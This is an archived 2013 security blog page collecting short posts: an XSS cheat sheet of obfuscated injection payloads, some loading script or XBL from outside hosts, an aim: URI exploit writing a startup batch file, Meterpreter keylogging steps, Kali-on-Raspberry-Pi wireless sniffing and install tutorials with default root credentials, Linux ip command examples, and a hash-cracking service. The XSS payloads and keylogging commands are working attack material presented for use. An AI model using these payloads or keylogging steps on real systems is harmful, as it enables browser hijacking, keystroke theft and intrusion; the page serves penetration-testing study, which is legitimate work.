Mar 16, 2013

Howto: XSS Cheat Sheet

If you want to see all in the list, please go to the Source.

A very short cross browser header injection
Exploit Name: A very short cross browser header injection
Exploit String: with(document)getElementsByTagName('head')[0].appendChild(createElement('script')).src='//ŋ.ws'
Exploit Description: This vector shows one of the shortest possible ways to inject external JavaScript into a website's header area.
Exploit Tags: xss, short, header, injection
Author Name: .mario
Add onclick event hadler
Exploit Name: Add onclick event hadler
Exploit String: onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);
Exploit Description: This vector adds an onclick event handler to a tag and appends an obfuscated JS alert.
Exploit Tags: general, JS breaking, basic, obfuscated, user interaction
Author Name: kishor
Advanced HTML injection locator
Exploit Name: Advanced HTML injection locator
Exploit String: <s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&#60&#115&#62&#51&#51&#51&#60&#47&#115&#62&#x3c&#x73&#x3e&#x34&#x34&#x34&#x3c&#x2f&#x73&#x3e
Exploit Description: This vector indicates HTML injections by stroked text.
Exploit Tags: general, html breaking, injection
Author Name: .mario
Advanced XSS Locator
Exploit Name: Advanced XSS Locator
Exploit String: ';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){//
Exploit Description: Advanced XSS Locator
Exploit Tags: general, html breaking, comment breaking, JS breaking
Author Name: .mario
Advanced XSS Locator for title-Injections
Exploit Name: Advanced XSS Locator for title-Injections
Exploit String: ';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");}
Exploit Description: This is a modified version of the XSS Locator from ha.ckers.org especially crafted to check for title injections.
Exploit Tags: general, html breaking, comment breaking, JS breaking, title breaking
Author Name: .mario
aim: uri exploit
Exploit Name: aim: uri exploit
Exploit String: aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
Exploit Description: This aim-uri executes the calc.exe on vulnerable systems
Exploit Tags: URI exploits, gecko, injection, general
Author Name: xs-sniper
Backslash-obfuscated XBL injection - variant 1
Exploit Name: Backslash-obfuscated XBL injection - variant 1
Exploit String: <div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL.
Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated
Author Name: thespanner.co.uk
Backslash-obfuscated XBL injection - variant 2
Exploit Name: Backslash-obfuscated XBL injection - variant 2
Exploit String: <div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45&
#98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:&
#92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105&
#110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46&
#99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115
&#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92
&#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&>
Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. All important characters are obfuscated by unclosed entities.
Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated
Author Name: thespanner.co.uk
 
 

 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Generate Wordlist On Windows

L517 contains hundreds of options for generating a large, personalized, and/or generic wordlist. With L517, you can generate phone numbers, dates, or every possible password with only a few clicks of the keyboard; all the while, filtering unwanted passwords.  

Source: https://code.google.com/p/l517/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Wireless Penetration testing with Kali Linux on a Raspberry Pi

1. Just Plug your USB Wi-Fi adapter into the PI.

2. At the command prompt type “ifconfig” and check to see if your Wi-Fi adapter is listed. It should show up as wlan0. If you don’t see it, type “ifconfig wlan0 up“. Then run “ifconfig” again and it should show up:
Wireless wlan0
3. Next let’s see what networks our wireless card can see.
Type, “iwlist wlan0 scanning“:
Wireless Iwlist
4. Now let’s run some of the basic Aircrack-NG tools.
First we need to put our wireless adapter into monitoring mode.
Type “airmon-ng wlan0 start“:
Wireless airmon
This creates a new wireless adapter called mon0. Now we can use this interface to capture wireless management and control frames.
5. Used tcpdump instead.
Simply type tcpdump -i mon0:
TCPDump
This will display all the management and control communication for all wireless networks within the reach of your Wi-Fi adapter.

Source: http://cyberarms.wordpress.com/2013/03/14/wireless-penetration-testing-with-kali-linux-on-a-raspberry-pi/



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Installing Kali(Backtrack6) on Raspberry Pi



1. Download the Kali Linux Image (Located about halfway down the page)

2. The image file is compressed you will need to expand it.

3. Next, Install the image to your SD card – Disk Imager works great.

Just plug your SD card into your Windows Laptop, and run Disk Imager. Point the image file to your Kali image that you downloaded and point the device to the drive letter of your SD card.

Then just hit “Write”:

Kali Disk Imager Installing

Disk Imager will write the Kali Linux image to your SD card.

4. Now eject the SD card from your windows laptop and insert it into the SD card slot on your Raspberry Pi. Connect your video, Ethernet cable, and keyboard and mouse.

5. Connect power to the Raspberry Pi and in a few seconds it will boot up into Kali.

That is it! You know have a Raspberry Pi Pentesting platform!

Connecting to the Raspberry Pi remotely from a Windows system using SSH


Now you can run commands from the command prompt, or if you want to run the Raspberry Pi headless (without monitor or keyboard). You can connect to the Pi from a Windows system remotely using SSH!

To Do so:

1. Download Putty for Windows

2. Run Putty and put in the IP address for your Kali System. You can get this by typing “ifconfig” if you have a keyboard attached or by checking the address given to it by your router if you are running Kali headless.

My IP address was 192.168.1.135 in this case. Also, make sure port 22 is entered and select SSH as shown below:

Putty

Then just hit “Open”.

You will be asked asked to log into the Raspberry Pi. If this is the first time, just use the Kali default credentials:

Username: root
Password: toor

Remote Login

That’s it!

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Mar 14, 2013

Howto: 10 Useful “IP” Commands to Configure Network Interfaces

1. How to Assign a IP Address to Specific Interface The following command used to assign IP Address to a specific interface (eth1) on the fly.
# ip addr add 192.168.50.5 dev eth1
$ sudo ip addr add 192.168.50.5 dev eth1
Note: Unfortunately all these settings will be lost after a system restart.
2. How to Check an IP Address To get the depth information of your network interfaces like IP Address, MAC Address information, use the following command as shown below.
# ip addr show
$ sudo ip addr show
3. How to Remove an IP Address
The following command will remove an assigned IP address from the given interface (eth1).
# ip addr del 192.168.50.5/24 dev eth1
$ sudo ip addr del 192.168.50.5/24 dev eth1

4. How to Enable Network Interface
The “up” flag with interface name (eth1) enables a network interface. For example, the following command will activates the eth1 network interface.
# ip link set eth1 up
$ sudo ip link set eth1 up

5. How to Disable Network Interface
The “down” flag with interface name (eth1) disables a network interface. For example, the following command will De-activates the eth1 network interface.
# ip link set eth1 down
$ sudo ip link set eth1 down

6. How do I Check Route Table?
Type the following command to check the routing table information of system.
# ip route show
$ sudo ip route show

7. How do I Add Static Route
Why you need to add Static routes or Manual routes, because that the traffic must not pass through the default gateway. We need to add Static routes to pass traffic from best way to reach the destination.
# ip route add 10.10.20.0/24 via 192.168.50.100 dev eth0
$ sudo ip route add 10.10.20.0/24 via 192.168.50.100 dev eth0

8. How to Remove Static Route
To remove assigned static route, simply type the following command.
# ip route del 10.10.20.0/24
$ sudo ip route del 10.10.20.0/24

9. How do I Add Persistence Static Routes
All the above route will be lost after a system restart. To add permanent Static route, edit file /etc/sysconfig/network-scripts/route-eth0 (We are storing static route for (eth0) and add the following lines and save and exist. By default route-eth0 file will not be there, need to be created.

For RHEL/CentOS/Fedora

# vi /etc/sysconfig/network-scripts/route-eth0
10.10.20.0/24 via 192.168.50.100 dev eth0

For Ubuntu/Debian/Linux Mint

Open the file /etc/network/interfaces and at the end add the persistence Static routes. IP Addresses may differ in your environment.
$ sudo vi /etc/network/interfaces
auto eth0
iface eth0 inet static
address 192.168.50.2
netmask 255.255.255.0
gateway 192.168.50.100
#########{Static Route}###########
up ip route add 10.10.20.0/24 via 192.168.50.100 dev eth0
Next, restart network services after entering all the details using the following command.
# /etc/init.d/network restart
$ sudo /etc/init.d/network restart

10. How do I Add Default Gateway
Default gateway can be specified globally or for in interface-specific config file. Advantage of default gateway is If we have more than one NIC is present in the system. You can add default gateway on the fly as shown below command.
# ip route add default via 192.168.50.100
$ sudo ip route add default via 192.168.50.100
Kindly correct me if i missed out. Please refer manual page doing man ip from terminal/command prompt to know more about IP Command.

Source: http://www.tecmint.com/ip-command-examples/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Mar 11, 2013

Tools: CrackStation.Net - Free Password Hash Cracker

Crackstation uses massive pre-computed lookup tables to crack password hashes. These tables store a mapping between the hash of a password, and the correct password for that hash. The hash values are indexed so that it is possible to quickly search the database for a given hash. If the hash is present in the database, the password can be recovered in less only a fraction of a second.

Source: http://crackstation.net/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Mar 10, 2013

Howto: Keylogging with Metasploit

1. Exploit the Client

2. List the Process with 'ps'
meterpreter> ps

3. Find the PID of Explorer.exe

4. Migrate to connect the explorer.exe
meterpreter> migrate pid_of_explorer.exe

5. Start keylogging
meterpreter> keyscan_start

6. Dump the keylogger memory.
meterpreter> keyscan_dump    


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: HTTY - Console For HTTP Protocol

htty is a console application for interacting with web servers. It’s a fun way to explore web APIs and to learn the ins and outs of HTTP.

Source: http://htty.github.com/htty/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |